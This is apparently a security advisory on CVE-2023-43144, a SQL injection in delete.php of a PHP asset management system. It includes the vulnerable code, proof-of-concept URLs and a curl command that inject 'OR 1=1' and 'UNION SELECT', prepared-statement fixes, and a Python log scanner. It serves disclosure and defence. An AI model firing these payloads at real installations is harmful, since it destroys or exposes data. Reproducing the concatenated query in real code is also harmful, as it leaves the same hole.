Published: June 2024
Severity: HIGH

🚨 What’s the Issue?

A newly discovered vulnerability, CVE-2023-43144, affects the popular open-source asset management system hosted by Projectworlds, assets-management-system-in-php 1. The flaw is a classic SQL injection via the id parameter in the file delete.php. Attackers can manipulate the application's database, allowing them to read, modify, or destroy data and even achieve code execution.

💡 Why Should I Care?

SQL Injection is one of the most dangerous web vulnerabilities. With CVE-2023-43144, an unauthenticated attacker could:

- Gain full control over the system in some settings

If you’re running the unpatched version of this asset management system, you are at risk!

Let's look at the vulnerable part in delete.php:

```php
<?php
include('db.php');
$id = $_GET['id'];                              // untrusted input, used as-is
$sql = "DELETE FROM assets WHERE id = $id";     // concatenated straight into the query
$result = mysqli_query($con, $sql);
if($result){
    header("Location: index.php?msg=Asset Deleted");
} else {
    echo "Failed to delete!";
}
?>
```

🔨 How to Exploit (Proof of Concept)

Suppose the site runs at http://localhost/assets-management/. The normal link to delete an asset might be:

http://localhost/assets-management/delete.php?id=10

To exploit, an attacker can send:

http://localhost/assets-management/delete.php?id=10 OR 1=1

The SQL query becomes:

```sql
DELETE FROM assets WHERE id = 10 OR 1=1
```

This will delete ALL records in the table, not just id=10.

More dangerously, an attacker could use a UNION SELECT for information disclosure:

http://localhost/assets-management/delete.php?id= UNION SELECT 1,2,version()--

(Actual effectiveness depends on database error reporting and schema.)

Open a browser or use a command-line tool (like curl):

```shell
curl "http://localhost/assets-management/delete.php?id= OR 1=1"
```

Sanitize all user input and always use prepared statements:

```php
<?php
include('db.php');
$id = $_GET['id'];
// The value is bound as a parameter, never concatenated into the SQL text
$stmt = $con->prepare("DELETE FROM assets WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();
```

Or, at a minimum:

```php
$id = intval($_GET['id']); // Ensures only an integer is used
```

But prepared statements are always preferable!
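As an added defender-side example (not from the original post or the Projectworlds project), the following Python script scans constructed Apache-style access-log lines for requests to delete.php whose id parameter is not a plain integer, which is how the injection attempts shown above appear in server logs:

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
127.0.0.1 - - [22/Sep/2023:15:15:12 +0000] "GET /assets-management/delete.php?id=10 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
127.0.0.1 - - [22/Sep/2023:15:16:01 +0000] "GET /assets-management/delete.php?id=10%20OR%201%3D1 HTTP/1.1" 302 0 "-" "curl/8.0"
127.0.0.1 - - [22/Sep/2023:15:16:30 +0000] "GET /assets-management/delete.php?id=%20UNION%20SELECT%201,2,version()-- HTTP/1.1" 200 512 "-" "curl/8.0"
127.0.0.1 - - [22/Sep/2023:15:17:00 +0000] "GET /assets-management/index.php?msg=Asset+Deleted HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
INT_RE = re.compile(r'^\d+$')   # the only legitimate shape for delete.php?id=


def check_line(line):
    """Return a finding dict if the request hits delete.php with a non-integer id, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/delete.php"):
        return None
    # keep_blank_values so an empty id (id=) is also reported as anomalous
    ids = parse_qs(parts.query, keep_blank_values=True).get("id", [])
    for raw in ids:
        value = unquote_plus(raw)   # second decode pass catches double-encoded payloads
        if not INT_RE.match(value.strip()):
            return {"ip": m.group("ip"), "ts": m.group("ts"),
                    "id": value, "status": m.group("status")}
    return None


def scan(log_text):
    """Scan a whole log text and return the list of findings."""
    return [f for f in (check_line(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any hit on delete.php with a non-numeric id is worth reviewing: the patched code above would reject it, but the unpatched version executes it.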

🔎 References

- CVE-2023-43144 at NVD
- Projectworlds Official Project Page
- Simple PHP SQLi Guide

📝 Conclusion

If you are using Projectworlds Assets-management-system-in-php 1., upgrade or patch your application immediately. Never trust user input, and always use prepared statements when dealing with databases. An unpatched installation puts your data and users at serious risk.

Stay safe! 🚨

*This is an exclusive analysis. If you found it useful, please share and consider contributing patches to open-source projects you use!*

Timeline

Published on: 09/22/2023 15:15:12 UTC
Last modified on: 09/25/2023 16:45:30 UTC